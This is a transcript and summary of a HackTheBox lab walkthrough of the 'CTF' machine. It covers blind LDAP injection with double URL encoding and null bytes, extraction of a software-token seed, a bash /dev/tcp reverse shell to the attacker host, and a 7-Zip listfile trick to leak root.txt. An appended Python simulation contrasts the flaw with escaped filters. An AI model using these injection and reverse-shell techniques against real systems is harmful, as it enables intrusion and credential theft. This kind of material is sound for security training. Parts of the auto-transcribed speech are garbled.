HackTheBox - CTF

IppSec · Beginner · 6y ago

Key Takeaways

The video walks through the HackTheBox machine "CTF" (named after stoken's Compressed Token Format, not Capture The Flag). It uses nmap, Burp Suite, wfuzz and a small Python script to: identify a character blacklist on the login form and slip past it with double URL encoding; recognise the blacklisted characters as LDAP syntax; use a null byte to count the unclosed parentheses of the server-side LDAP filter; enumerate the username (ldapuser), the valid LDAP attributes, and the 81-digit software token stored in the pager attribute with wildcard-based blind LDAP injection; generate one-time passwords with stoken after syncing the attacker's clock to the server; bypass the adm/root group check with another null byte to reach command execution as apache; get a reverse shell; and recover the ldapuser password from login.php to SSH in before starting privilege escalation on a backup script that runs every minute.

Full Transcript

What's going on YouTube, this is IppSec. I'm doing CTF from HackTheBox, which doesn't stand for Capture The Flag; it stands for Compressed Token Format, which is that string of digits that changes every minute when doing two-factor login. It's most commonly associated with RSA fobs, but there are also software implementations like Google Authenticator and things like that. I really like this box because, number one, it starts off with LDAP injection, and I don't think we've done that before in a box, but number two, it's really one long, hard problem that becomes relatively easy as long as you enumerate properly and always type what you know, because a hurdle you come across 20 minutes into the problem may be something you found out at the start, and if you don't draw that connection you may just be stuck a long time and go down a rabbit hole you don't need to go down.

With all that being said, let's get in. As always, begin with nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it ctf, and then the IP address, which is 10.10.10.122. It does take some time to run, so I've already run it. Looking at the results we have just two ports open. The first one is SSH on port 22 and it's running OpenSSH version 7.4. Then we have HTTP on port 80 and that's running Apache httpd version 2.4.6, and it's also telling us it's a CentOS box. Whenever I see CentOS I translate the name into Red Hat, because Red Hat is the paid version of CentOS and paid things are generally documented a lot better. So I'm just going to google "Red Hat httpd versions", then we can probably go to the very first page, search 2.4.6, and we see 2.4.6 is supported by Red Hat Enterprise Linux 7. If it was 2.4.37 we'd know we're on a Red Hat Enterprise Linux 8 box, and of course you can replace RHEL with CentOS. So this is just letting us know the version, not a huge deal, but it is always nice to know in case you have to replicate the environment that you are attacking. So let's just
go and check what's listening on port 80. Going over to Firefox and navigating to the page at 10.10.10.122 brings us to the home page with a nice little note: as part of our SDLC (software development lifecycle) we need to validate a proposed authentication technology based upon software tokens; please log in and do a test. The server is protecting against some kind of threats, for instance brute force, saying if you try to brute force you may be banned for up to five minutes; if you get banned it is your fault, so don't reset the box, and please let other people do work while you think of a different approach. The list of banned IPs, or a "wall of sheep", may be found here, and you may not be able to view it while you're banned. So let's go check out that wall of sheep, and we just see the server status telling us the server is up, it gives us the uptime of the server, and we have a list of banned IPs. You could try doing something like ?cmd=whoami to see if you can get this command to change, but it doesn't look like it. We can look at the page source to see if we have any idea there; it's not really telling us anything about how it's running top or why. So we can go back to the home page and look at the page source to see if there are any hints there, and it doesn't look like it, so we might as well just get on with what is asked and do a pen test on this login page.

We are greeted with username and OTP, or one-time password, so let's try logging in with "pleasesupportmeonpatreon" and the one-time password of 1234. Click login and we get "user is not found". So the first thing I'm going to do is try some type of cross-site scripting: I'm putting the bold HTML tag in to see if this gives bold, and we get absolutely no response, so it doesn't look like that's working. I can try something like double URL encoding to see if that fixes it, so if we do <b>test, 1234... let's just send this over to Burp to make it a bit easier to edit. So do that, make sure Burp intercept is
on, click login, go to Burp, and we can see it's already doing a lot of URL encoding, so I'm just going to press Ctrl+Shift+U to undo that so we can see what's going on. I definitely do want that URL encoded, so let's Ctrl+Z to back out, and to URL encode we just highlight what we want hexed and then press Ctrl+U, so percent is %25. We'll do that again and then click forward to see if this bypasses any type of thing, and we get "user is not found". So there is some type of blacklist, because it just did not like our carets, but we don't really have any information other than that, so that's just something we should note in the back of our head.

Press Ctrl+U to go to the page source to see if there are any hints here, and we have: "We'll change the schema in the next phase of the project if and only if we pass the vulnerability assessment / pen test. At the moment we have chosen an already-existing attribute in order to store the token string, which is 81 digits." So at this point I'm going to do a little bit of research, because if we go back to this home page (let's turn Burp intercept off) we have "software token", and we know this is a Linux box, so I'm just going to google "software token Linux" and see if we come up with anything. The very first page is giving us a stoken page, or the GitHub for stoken, and this is going to create RSA SecurID 128-bit compliant tokens. So I'm going to do `man stoken` to see if we have any more information, and let's see: stoken is a software token for cryptographic authentication. It keeps going down; I'm just going to search to speed this up, and under basic usage we have "pure numeric, 81 digits", which matches what the page source is saying, 81 digits, and then we also have CTF, compressed token format, so this is what the box's name is. So chances are stoken is the application we'll want to use to generate this token. Unfortunately for us, for stoken to work we need to know the seed for the user, and we don't even know the user. So that's
where we're going to start off: just try to enumerate usernames. So we'll do root, 1234, try to login, and we get "user root is not found". So let's try the user guest, 1234: guest isn't found. admin, 1234: admin's not found. We can try SQL injections, so `admin' or 1=1` and 1234, and we don't get anything back, so probably they have to do some type of blacklist filtering. But instead of trying to evade a blacklist, the quickest thing to do is to brute-force a name. Unfortunately there is the blacklist protection, so we can't use big wordlists, but we should be able to use relatively small ones. So I'm going to do `find /usr/share/seclists` and grep for "username", and we can see there are two. I'm going to do `xargs wc -l` to see the number of lines: we have an 825-line one and a 17-line one. 825 may trigger the blacklist or block, so I'm going to start with this 17 one. Copy this here and then we can take a look at the top usernames: root, admin, test, info, administrator, puppet, whatnot.

So let's do wfuzz -H... and we want -d for POST data, so `wfuzz -d`. We didn't know what parameters the page accepts, so going over to Burp and looking here we have inputUsername and inputOTP. So let's do inputUsername=FUZZ and inputOTP=1234, then -w for wordlist, we can just do top-usernames-shortlist, and then the URL, which is http://10.10.10.122/login.php I believe. Going back here, yeah, login.php. Go through this and we see everything comes back as 68 lines, 233 words; the characters is a little bit off but that's because the page is echoing the username back at us. So we can just do --hw 233 (hide words), and of course we don't get anything back because none of those appear to be valid users. So let's try to fuzz the login form a bit more to find exactly what is blacklisted. I'm going to go again into /usr/share/seclists, this time going to Fuzzing, and copy the special-chars file to my working directory. We can take a look at this; it's just a list of
every special character. So we can do wfuzz again with that, so instead of top usernames we'll just replace this with special-chars, and then we see 68 lines and 229 words. It's saying 229 words because we just don't get anything; remember, if we went into Firefox and put something like a caret or a greater-than, it doesn't say "cannot find user", it just errors out. So looking at each of these: we can't do tilde, we can't do exclamation point, can't do wildcard, open parenthesis, ampersand, close, plus, equals, pipe, backslash, greater-than. Oddly enough the plus gives us 232 words, so let's see exactly why it's doing that. If we do username +, 1234: "user + is not found". Hide 233; I don't think it's counting plus as a word. That's funny, but yeah, it doesn't count this as a word, so that's why it's different.

If we wanted to, we could do two different approaches to do special characters. The first is URL encoding: we could change this to -z, which allows us to specify different inputs; we could say `file,` and then specify the file, and there's a third parameter that is the encoder. I'm going to put something here; it's not going to work because I don't know what it is. I do `wfuzz -e encoders` and it's going to list what is there: we can convert everything into hex or double hex, so we want to do double hex. So if we do `,uri_double_hex` we can see what special characters do, and let's see. I don't exactly like this because it doesn't do everything: valid URL characters it doesn't encode. So instead of doing it that way, which some people may think is the correct way, I'm just going to do it the lazy way and specify a different wordlist. So let's go to /usr/share/seclists and then Fuzzing, and then it's like URI-hex, and "double" is spelt weird, and this is just %25, and in case you didn't know, %25 is the hex for a percent, so it's kind of like Inception there: %25 we see, 25 is %. So what
we're doing with this wordlist is just hoping that the blacklist is being applied before the application does URL decoding, and we're also hoping the application will double URL decode. So take 0x41: that is always going to be A; if you do buffer overflows you'll probably know that address range off the top of your head. So if you just send the server %41 it's going to know to decode that into A, but this is where the blacklist may be applied, so it may say "if this is A then block", because they don't want you sending a hundred As to cause a buffer overflow. So maybe that's how their filter works. Well, if you set this to %2541 it will pass this check, and then maybe the application will do a decode on it to turn that into %41, and then it may just decode it again, because applications don't want to fail, and realize that is A, and you have successfully bypassed their blacklist. So essentially that is how this double URL encoding is working, and we're just going through every single hexadecimal value.

So let's do that wfuzz again, and instead of doing special-chars we will do URI-hex, and then hope we don't hit the blacklist because this is sending quite a few characters. It's looking like everything is good and we got a few characters in before we got blocked. We can always check if we got blocked by clicking on a page, and if it responds we are not blocked, so that is good. The first character it barfs on is %2500, which is null byte, so that is good to know, that null byte is doing something weird. We have %25... again, %28; I don't know what 28 is, so let's just do `man ascii` again. What the hell, how do I spell ascii? Oh, it's two i's. There we go. I don't know why I had a brain fart right there, but we can look at 28 and that is going to be open parenthesis, then 29 is close parenthesis. So we probably should be taking notes, so `vi notes`: application barfs at null byte, close, open. 2a, we
can see that's right here, that is going to be a star, so let's go: star. And the last one is 5c, so search for this, not found below, search up: backslash. So thinking about this a little bit, I recognize a lot of these characters as LDAP things, not really SQL injection. Blacklisting parentheses in SQL may be a bit odd; I would expect things like dashes, pounds and other things to be causing issues with SQL, but just based upon parentheses, wildcard and backslash I jump over to LDAP.

So in order to understand LDAP, if this whole thing didn't make sense, you have to understand kind of how the LDAP parameters work. So let's do ldapstructure.note, and essentially an LDAP query looks like this. It's a bit weird because the comparison is at the very beginning, so it starts off with a parenthesis and an ampersand; a parenthesis-ampersand means AND, and this (pipe) means OR. So it starts off with this and then you do values, so this may be like password=ippsecrocks, and then this could be uid, for user, =pleasesub. So this query means, try to think in SQL terms, we could do this being like SELECT * WHERE uid (or username) = pleasesub AND password = ippsecrocks. If this was this (a pipe), this would be SELECT * FROM ... WHERE uid = pleasesub OR password = ippsecrocks. So hopefully that makes sense; just keep in mind this means an AND, these combined. If you wanted to do multiples you could do like this, and then we'll just do that later. Actually you have to understand that later for nested LDAP queries, but knowing this you can see why our application is barfing, because we're putting a null byte here, which means it's terminating this query, so it fails because we ended without these two parentheses. We could test a theory by putting two parentheses and then a null byte and seeing if that succeeds. So let's go over to Burp to validate what we believe. Going over to the proxy, we can just send this request to
Repeater, and we'll say test, click Go, and this will say "username test". What do you... username is equal to pleasesub, pleasesub, and then search for pleasesub: "user pleasesub is not found". So if we put a %2500, which is what our wfuzz did (remember this is doing double URL encoding, so this is just a plus and then sending a null byte), we get "pleasesub is not found". So what we did, we terminated the query, whoops, right here. So what we want to do is add parentheses until this is valid. If we go back here we can do %25 and then I think it's 29, I think that was the close parenthesis; we could just do a close and then highlight this, convert, URL-encode all characters, and that is 29. So we just want this; click Go: pleasesub is not there. Paste again, click Go: pleasesub is not there. Let's do this one more time, click Go, and we got a match. So at three close parentheses our query was successful. We know what these two are, because the first parenthesis closed out uid, the second parenthesis closed out our comparison, that ampersand, but we got a third one here, which is weird. So we know there's a nest here that we don't know about, so it could be like ampersand, and then close this out, and then open a new one, this is unknown territory, unknown, and then comparing something and then closing that out, closing this. So we did that because we knew there were three, so that meant there was one additional nest above, and this is confusing. We'll just put a pipe here if I can type; I'll leave it at pipe, because I just apparently can't type; my mic's in the way of me viewing my keyboard. So this is what the query looks like, and again we validated that because of the null byte.

So let's look at other things. We knew what this did because that just offset the balance: if we put in a parenthesis it's just an uneven balance of parentheses so the query fails, same with the other way. If we do wildcard, this one is really different because that's giving us 231 characters, so let's try
injecting that. So going back to Burp we can just do %252a, which is the wildcard, click Go, and we get... let's see, do we have "not found"? We just get "cannot login". So this is different: this isn't "not found", this is not "cannot find user", it's "cannot login". So we hit a valid username with a wildcard. So if we just brute force all the characters maybe we can find out the user, because if there's any user that begins with a, and then we have a star, it would probably be "cannot login" again. So because it says a-wildcard not found, we can do b: not found. But instead of doing this all manually, let's go back over into wfuzz and do this more automatically. To do that we'll probably have to copy another wordlist out of /usr/share/seclists, so this is going back to, let's just do find, and I want to grep char. So this is the one I want, and all char is, is a list of everything a to z. So what we're going to do: wfuzz, inputUsername is going to be FUZZ, which is going to be a character, and I'm going to do %25 then 2a, which is the wildcard, and the wordlist is just going to be char. So click and go, and we get only one hit back, and that is l. So if we did this back in Burp, we do l%252a, we'll see "cannot login". So we can keep going down this path: if we do lFUZZ we get d, then we do ldFUZZ we get a, and then we do p, and you kind of get where we're going. If we kept doing this it would show ldapuser, and at the end of user we don't get any more hits back, so we know that user probably exists. We can validate that by just trying to log in with the user ldapuser, one-time password of something, and we get "cannot login". If we did ldapuse without the r, the user doesn't exist; if we do ldapuse and then %2a (and I think the browser will do this URL encoding), 1234, "cannot login". So we know the username is ldapuser.

If we go back to this we can create a query now, so we're injecting here, ldapuser, and we know the application is appending this. So what we
could do is put another comparison and put the variable, attribute, equal to star, and we won't close this out because the application will do that. What this is going to do is tell us what the attributes are in LDAP, and it's kind of how LDAP works. Again, this box can be hard if you don't understand LDAP; if you search "ippsec LDAP" maybe there are videos; I know we've gone over it, I'm just not sure how well. But LDAP has a bunch of default attributes, and if you went back to, I think it's this page, in the source: "at the moment we have chosen an already-existing attribute". These are just like variables a user can have, so this would be like home directories, phone numbers, address; essentially any extended attribute in Active Directory is an LDAP attribute. So if you do "LDAP PayloadsAllTheThings", yep, that's the repo; this has one for LDAP injection, Intruder, and LDAP attributes. This is an awesome thing of just all the default LDAP attributes that are there by default. So what we want to do is copy that wordlist into a location. I'm just going to locate attributes... attribute, attributes, attributes.txt. I do have the PayloadsAllTheThings repo saved on my Kali, so I'm going to copy this and we're going to call it attributes.txt, and again you can see the contents of this file, it's just this.

So what we're doing here is going to verify what attributes exist, and I hate typing URL encoding, so we're just going to do this in Repeater and then copy it into wfuzz. I'm just going to go here and we have to type ldapuser, and then we're going to close out the parenthesis, open parenthesis, FUZZ, and FUZZ is going to be each one of these, equal to star, which means anything. We're not going to close out the parentheses; if we did, we'd have an uneven number because the application is closing it for us. So the first thing I'm going to do is highlight everything, Ctrl+U to URL encode it, and I see it's only encoding that equal sign, because everything else it doesn't
have to, but we definitely want it to. So I'm just going to highlight those things, do convert selection, URL encode. Ctrl+U is only doing key characters; we want to do it all, and then I also want to do these parentheses, so convert selection, URL, all characters, and then if I highlight the whole thing and press Ctrl+U it's going to encode each percent into %25. So this is the query I want. Let's highlight that, Ctrl+X to cut it, or copy, and then we want to go back to wfuzz, and we're going to change this inputUsername; we'll just do Shift+Insert and that's going to paste the query we want, and then change char.txt, which is the wordlist, to attributes.txt. And we can see all the attributes that are valid, which are commonName, cn, name, mail, objectClass, pager, password, sn (surname) and uid. So we want to get the software token out of this, and we can do it the same way we did the username; we can brute force any of these fields, but I'll leave that as an exercise for you. We're going to focus on the software token, which we know is 81 digits. So where would you generally store 81 digits? Probably the pager attribute, because no one uses pagers anymore and it's meant to hold numbers, so that's the one we're going to choose.

So if we go back to our query we want to do pager is equal to something, and that's going to be a number, and we know it's going to be 81 digits long. So I don't want to do, what is it, the -w, 81 times; let's create a script to make our lives a bit easier. So we'll do `vi brute.py` and begin the creation. The first thing we do is let everyone know this is a Python 3 script, and then we'll need to do an import statement. We definitely want to do something with the web browser, so we're going to import the requests module. We'll probably want to import sleep, so we'll do `from time import sleep`, because we don't want to get caught brute-forcing; we have to be kind. Then we also need a list of digits, so I'm going to do `from string import digits`, and then to make your life easier
if you want to go further I'm going to import ascii_lowercase, and all this does is, if we do print digits, print ascii_lowercase, it's going to create those variables for you. So `python3 brute.py`, we can see it printed 0 through 9 and a through z, so that's all that import statement does. Then we probably want to give token is equal to nothing, and I'm going to do `for digit in digits`, and it's going to loop through each number. We're going to set token is equal to token, so right now we're setting it to nothing, and then we're going to do query is equal to ldapuser, and I'm not URL encoding in here because I believe requests will encode this for me; if we did %25 we'd do a triple encode, which I don't know would work. So we're just doing %29, which is going to be that close bracket, or close parenthesis, then 28, which is the open parenthesis, and we want to specify attribute and then %3d, which I think is the equals. If we go to a pane, `man ascii`, 3d is equals. And we want token, and then we'll do digit, and 2a for wildcard. So again, what that's doing, if I can do a comment like this, this would be ldapuser, then attribute, pager, is equal to token star. So that's all that query is, and we need to declare attribute, so we'll do attribute is equal to pager. Okay, so now we can do the POST request part: data is equal to inputUsername, and that's going to be query, and then we want inputOTP (I think that's all capitals; go back to Burp, OTP is all caps), we can say 1234. So that is done, and now we can crawl: r is equal to requests.post, URL, data is equal to data, and we also want to declare URL is equal to http://10.10.10.122/login.php. Okay, and then if "cannot login" is in the text of this response, print an f-string "success" and this is digit, and we can break out of this. So this is going to be our test; let's see if this works: `python3 brute.py`, and we got nothing, so that did not work. So let's do proxy is equal to http, and this is just localhost
8080, and this will be proxies is equal to proxy. No, right there, my bad, it goes in the request portion: proxies is equal to proxy. I think I set that correctly, so now we can go back into Burp, turn intercept on, and let's see if we intercept it. We do, so send it to Repeater and let's look at this. Do we get anything? No we don't. Let's Ctrl+U to decode that, Ctrl+U again to decode again, and I have two closes, so that's probably what I screwed up on. So go into brute, let's see, 29 29; it's 29 28. We turn intercept off, let's see if this time we hit it: "success 2". So the very first character is 2, and then if we say token is equal to 2 we can get the next character, but we don't want to be in the business of doing this 81 times, well, now like 80 times, so we have to create a loop around this. Let's go to the beginning of the for loop, press Shift+V to enter visual mode, highlight everything and then do, I think, the greater-than sign, that is this one, to indent everything. And I'm going to do a lazy way to get this done: `while loop > 0`, and we can say loop is equal to 1, and then down here we can do `elif digit == "9"`; I believe that can be cast as a string, which is why I put the 9 in quotes; I think we need two equals, and this will be loop is equal to 0, break. So what that's doing is, if we ever hit 9 and we don't have a match then the script's done, and we're going to set loop to 0 to end the while loop and exit everything. And what we also have to do is say token is equal to token plus digit, and I think it's treating everything as a string, so that's not going to do math, hopefully, but we will find out. So go here: success 8, success 5, 4, 4. That was weird, so let's see: success digit, we want to do success token. Oh, we got banned, that's why it stopped there. Crap. We do `python brute`: success 2, 8, 2, 8, 5, 2, 8, 5, 4. Maybe we did get banned; I don't know why it just really stopped, but we definitely need a sleep,
so I'll put a sleep upon success. Huh, let's be extra paranoid and put a sleep on every single request, and we can say go, and this will be success 2... wait, our token is set to start at 2, we don't want that. So success 2, and then we're going to wait a little bit because it has to get to 8, so that would probably be 8 seconds, so three, two, one; I suck at counting or keeping track of time in my head. There we go, success 2, 8. So let's add a little flair to this to make it so we can see progress. What I'm going to do is import sys, and we're going to change this print statement, so we can get rid of this, and right here where sleep is we can do sys.stdout.write and then a carriage return, to do a line: token, and token digit. So what this is going to do is keep overwriting what it's printing and tell us what digit it's working on, so this should look pretty cool as long as we remember to close out that parenthesis. Click, `python brute`: token 0, 1, 2, and now I'm moving to the next character, and this will hopefully go to 8, and it will take up to 81 characters. So we're just going to let this go and I'm going to speed up the video, because you can imagine how long this would take.

And there we have it, the token is complete. If we copy this we can do `echo -n`, paste, `wc -c`, and we have 82 characters, so somewhere we have screwed up. It's probably that 9, the trailing character, because, well, 9 is the very last number; if you look back at our script we're printing out the token, so we never go and delete that. So we can put a TODO, and these would be tasks for you: brute force all attributes, may need to use ascii_lowercase and such; and then we got another TODO: last character printed is bad, disregard. So some fun things, but we got the token. I'm going to create token.txt and paste it, just so we always have it, and then we can validate it works. So if we go to Burp, intercept is set to off; if we go back to Firefox, go to the login form, ldapuser, paste the token, we can't login. But if you remember
from earlier in the video we use something called stoken, that's software token, so what we're going to do is `apt search stoken` to see if it's an apt package, and we can just do `apt install stoken` to install it. Now with it installed we can do --help to see how to use it. We want --token equal to the token string and then hit enter, and then it says "enter PIN". I'm just going to enter nothing first; looks like my computer hung; there we go, it says PIN must be 4-8 digits, use 0000 (four zeros) for none. We can copy this and paste it here, and we still don't get it working. There is one thing to keep in mind when you use time-sensitive tokens or one-time passwords, and that is the time. So I want to go to Burp and we're going to go back into this Repeater tab, and it doesn't matter which query we do, we're just going to click Go and look at the time. So that is where the expiration date is 1981, so that's probably not a security finding, but just a notice: your cookie is set to expire in the past, which is weird. But looking at the date of the server in this header we can see the server thinks it is, I think that's 9:55 GMT, and we are a few minutes ahead of it. So what we have to do is set our time. I'm going to go into a terminal, and I'm going to set the time to be the 57th minute of the last hour, so `date -s 17:57`, and we see my date didn't change at all. So what I'm going to do is check our settings to see if the VM is taking over time; we see time sync is off. So what I'm going to do is issue the command `timedatectl set-ntp 0`; this is Network Time Protocol, we're disabling it, so now when I do `date -s 17:57` we see it updates here. So now let's do that stoken again; I think it's --pin=0000 so we don't have to do that every time. We can copy, go to ldapuser, paste, and we get a different thing: now we have command and OTP. So I'm going to issue the command whoami and we're going to go back to the PIN, it's still the same, click Submit: "user
must be a member of root or adm group and have a registered token to issue command on my server". So we're probably not a member of root or adm. However, now something's making sense: if we went back to the query when we enumerated exactly how this worked, we have this second one, so "user must be a member of", so we have this nested thing, and again we found out it was nested based upon the null byte and doing enumeration that way. So now we have group is equal to adm or group is equal to root. So what if we just put a null byte here and terminate the query after ldapuser? Let's try that, and maybe we can get the query to never execute the second parameter, which is adm or root. So let's go log out, log in again, and we're going to specify ldapuser, and then let's go to Burp to type this out because I hate doing URL encoding. So ldapuser, then the three close parentheses, and we need to URL encode all three of these, so convert selection, URL, all characters, and we also have a null byte. So let's send this in, and keep in mind a web browser is going to take each of these and encode that for us, so that's why we're not doing double URL encoding. So we can go back to stoken, pipe that to `xclip -selection clipboard`, and that just automatically put it in the clipboard; copy and paste, click login: "cannot login". So we screwed something up with our user: %29%29%29 null byte; I thought that worked before. We can try, let's just do it manually, so ldapuser, 1234, let's intercept this, so proxy, intercept on, log in again, wait, set Burp to be intercepting, ldapuser, 1234. Maybe I just didn't copy the token quickly enough, because it said "cannot login", so that was probably what happened. But let's paste... let's see, I have 751 on my clipboard; if I do this I have a different token, so it's definitely not that. But let's do this manually: let's go back to this Repeater, since we don't have a web browser now intercepting; to do the double URL encode we do it by just highlighting and pressing Ctrl+U, we can copy this, paste
that in and now we gotta do this one-time pad so or one-time password copy / paste forward and let's see we are now logged in so the command to issue we can do Who am I paste the token and we get the answer back Apache so we can do let's try a reverse shell bash see then we can do bash - I I think it's this dev TCP 10 10 14 3 9001 and then 0 and 1 let's make sure that's right before we do this so we can turn foxy proxy off pentester monkey grab she'll go to the cheat sheet fast - I greater than ampersand greater than ampersand and then 0 greater than ampersand 1 0 greater than I ever said 1 okay so the reason why I always do bashed SC before it is because this is a very bash thing so if I'm not in a bash shell first this doesn't exist so that's why I wrap everything in bash Jesse so we can try this so to try it we have to do and we'll do that Kat session in this window NCL VMP 9001 copy that go to the browser paste we don't get anything back we don't have a shell so maybe there's a firewall involved let's try a port that is generally allowed outbound for for 3 so copy token issue the command again submit cannot authenticate it's probably just time thing so let's try this again submit cannot authenticate zero six one seven nine two different token paste okay so that time it worked but we didn't set the port to four four three well not getting anything back if we go to a terminal we have a reverse shell as the Apache user awesome so let's do Python - C and port PT y PT y dot spawn then - how do PT y devices I don't know what happened but we just won't be able to upgrade a shell because we got just a weird error message so in order for LDAP to work we have to do things like bind to the LDAP server which is a authentication unless anonymous bind is but let's just check this so let's cat login dot PHP and see how it connects to the LDAP server we have the username as LDAP user we have this password and then we can see LDAP post LDAP colon slash slash CTF dot h DB 
username connect so search down password and here we go here's the bind request of us trying to connect with the user LDAP user and that password so let's try SSH into the box with LDAP user at 10 10 10 1:22 I'm gonna make sure the password is on my clipboard it is if I do ctrl shift insert so just wait for that login prompt and then ctrl shift insert and we get logged into the box so we have two shells on the box the first one is running as Apache and the second one is running as LDAP user do LS - la we can get user dot txt so we can definitely read this file so let's just enumerate the box some more I'm doing everything in this show because we have a property up PTY where I can do tab autocomplete I can clear the screen etc it's just much nicer to work with than that reverse shell so if we look at the root directory we have a non-standard directory called backup and going into backup we have a bunch of files and if we look at the timestamps on everything everything is within a minute so something runs every minute to create this file there is a dog with no contents and there is also honeypot SH so let's look at honeypot SH to see what's happening and this looks like the script that handles banned users so let's see now date + s so if the path isn't secure we can probably inject somewhere because they're not using absolute paths so the first thing I'm going to do exactly my path to see if there's any non-standard things and what I mean we do which date date is in user bin so user bin so it's going to go here if we had write access to here and created a program called date we could hijack the date Colin honeypot that Sh spot if we touch user local bin test we can't right there so that attack path isn't going to work we got a password and the password is using something out of route text which obviously we can't read so keep the last ten backups this is doing a LS stones if grabbing the 11 and like removing everything out to that so that looks fine now we're getting 
files from the honeypot to back them all up via dub dub dub HTML uploads 7-zip archive file names it which is that backup name - t7z I'm guessing - T is probably compression format - SNL I don't know - P for password - - generally means arguments are done everything after that is a file and what that's preventing us doing is creating files with like - something to force the execution of a command I know the joke of video I've abused that but there's a few videos that have abused it but since that's there we can't send arguments into 7-zip and then we have truncate - s 0 on the error log to erase it so let's go and look at everything that 7-zip is doing so man 7-zip hey for archive and I want to look at what - T is that is type so we are correct they're specifying the compression type SNL let's see SNL this is going to store symbolic links as links so what this is meaning is if we just put a symbolic link to route route text it's not going to go grab that file and put in the archive it's just going to put the link and the archive so doesn't help us at all and that's about it it does support something called list files and list files means like we can tell 7-zip the names the file or in this zip if that makes sense so if we created the who's gonna make a temp so we can delete this afterward if we created the file please sub and then created please sub without that at sign and then said root root dot txt test ABC it would archive all of these files into the zip so we can trick that into doing a symbolic link having it go to that link and then archive the contents of that link if that makes sense hopefully it does if it doesn't probably make sense after we abuse it so the first thing to do is go into row dub dub dub HTML and see if we can create files so CD for dub dub dub HTML go to uploads and we can't create files we do LSL ale in this directory we can see the apache user can which our net cat shell is the apache user so we can do CD / dub dub dub HTML go into 
uploads and we can touch and create files so what I'm going to do is go into backup I'm sure we'll do this all from this shell so look at the date we have 50 seconds so or 40 seconds now I'm going to touch please sub now we're going to create a symbolic link just from root dot txt whoops Ln - s root root txt when I call this please sub LS la we go in back up real quick tail - chef Eric log I'm probably didn't hit this time wait do we not have permissions in back oh okay we don't have permissions and back up as the shell so we have to do it from this shell Jo - chef Eric log we probably missed that timing window so let's redo this ver dub dub dub HTML uploads directory is clean so touch at please sub and when - s root root txt 2 VAR dub dub dub HTML uploads please sub make sure we hit that timing window so we see both files so what is going to happen is it's going to see we're doing a list file it's going to go into a file and pull the contents of it and each line in this file is going to try to archive and each file that doesn't exist it's running to the era log which we are viewing so it's going to go into root text and hopefully it can't read the hash that's in root X because that file doesn't exist and if that's the case it's going to output it in error so if we do LS la it hasn't ran yet date it's going to run in a few seconds and there we have it it ran actually twice so we see the hash there if we go back to the snack cat LS la alright - away it deleted the file but there you have it that is the box if you want to do more work I would highly recommend creating a Python script that uses the terminal to log into the application and execute commands here instead of doing a reverse shell you could do this box with just like a command prompt and running commands one at a time like base64 login dot PHP to get the password and then doing the touch commands from here and doing it all with them Python without a reverse shell it's a pretty tough thing to code so and 
there's also the two do's and the other script so I hope you guys enjoyed the video I'm sorry I don't know a way to get to the actual root user only read the text flag so maybe there'll be a write-up someone else did that actually gets code execution mezrab that's it take care see you all next week
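The filter injection the video walks through (double URL encoding to get past the blacklist, a wildcard to enumerate usernames, and a null byte to cut the filter off before the adm/root group check), as an added offline simulation. This is not code from the video or from the box's login.php. The filter layout (&(uid=...)(|(group=adm)(group=root))) is an assumption reconstructed from how the video describes the query, the blacklist contents are an assumption (the video only shows that one exists), and c_string_truncate() stands in for what a C LDAP library does with a NUL byte in the filter string. The hardened variant decodes once and escapes per RFC 4515 instead of blacklisting.

```python
from urllib.parse import unquote

# ASSUMED blacklist: the video only shows that login.php rejects LDAP
# metacharacters and that double URL encoding gets past the check.
BLACKLIST = set("()*\\|&\x00")

# ASSUMED filter shape, reconstructed from what the video describes: the
# login succeeds only if the user is also in the adm or root group.
FILTER_TEMPLATE = "(&(uid={user})(|(group=adm)(group=root)))"


def c_string_truncate(filter_str: str) -> str:
    """Model the filter reaching a C LDAP library: it ends at the first NUL."""
    return filter_str.split("\x00", 1)[0]


def ldap_escape(value: str) -> str:
    """RFC 4515 escaping for a value placed inside a search filter."""
    return "".join(
        "\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value
    )


def vulnerable_filter(raw_param: str):
    """Simulation of the flawed login flow the video exploits.

    1. the web server URL-decodes the parameter once;
    2. a blacklist rejects filter metacharacters in that decoded value;
    3. the application decodes AGAIN and concatenates into the filter.
    Returns the filter the LDAP library would see, or None if blocked.
    """
    once = unquote(raw_param)
    if any(ch in BLACKLIST for ch in once):
        return None
    twice = unquote(once)  # the second decode is what double encoding abuses
    return c_string_truncate(FILTER_TEMPLATE.format(user=twice))


def hardened_filter(raw_param: str) -> str:
    """Decode exactly once, then escape the value instead of blacklisting."""
    once = unquote(raw_param)
    return FILTER_TEMPLATE.format(user=ldap_escape(once))


if __name__ == "__main__":
    # Single-encoded: the blacklist sees ")" and NUL and blocks the request.
    print(vulnerable_filter("ldapuser%29%29%00"))
    # Double-encoded: the blacklist sees only "ldapuser%29%29%00"; after the
    # second decode the filter is (&(uid=ldapuser)) and the group check is
    # never evaluated, which is the null-byte trick from the video.
    print(vulnerable_filter("ldapuser%2529%2529%2500"))
    # Wildcard enumeration of usernames, same bypass.
    print(vulnerable_filter("l%252a"))
    # Hardened: the same bytes become a literal, escaped uid value.
    print(hardened_filter("ldapuser%29%29%00"))
```

The point of the hardened version is that there is no list of bad characters to keep complete: whatever survives the single decode is escaped, so parentheses, the wildcard and the NUL all end up as literal bytes of the uid value and the second half of the filter is always evaluated.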

Original Description

Support me on Patreon! https://patreon.com/ippsec

00:52 - Start of Recon, discovering CentOS Version via HTTPD Version
02:15 - Checking out the HTTP Page
03:32 - Checking out login.php
05:15 - Identifying a Secure Token is used, most likely STOKEN
07:05 - Failing to enumerate usernames through BruteForce
09:45 - Fuzzing the login form with special characters to identify a blacklist
11:45 - Trying Double URL Encoding to bypass the BlackList
12:55 - Explaining Double URL Encoding
14:45 - Discovering this is most likely a LDAP Injection
16:50 - Explaining how a LDAP Query Works
19:15 - Identifying the LDAP Query Structure with a Null Byte
20:40 - Injecting the WildCard (*) to enumerate usernames
24:00 - Using Wfuzz to extract the username
26:00 - Enumerating LDAP Attributes that are utilized
30:26 - Creating a python script to extract the Pager Attribute
41:38 - Script complete, lets extract the token
43:45 - Using STOKEN to generate the OTP and logging in
46:00 - Disabling NTP so we can match the server time
46:44 - Discovery of that second half of the original LDAP Query at 16 minutes.
47:33 - Using a Null Byte to remove the GROUP Check.
50:33 - Running Commands
50:25 - Reverse Shell Returned
53:17 - Checking for the LDAP Bind password, then SSHing into the box
55:00 - Going over the /backup directory
58:20 - Using ListFiles to have 7za print out the contents of root.txt
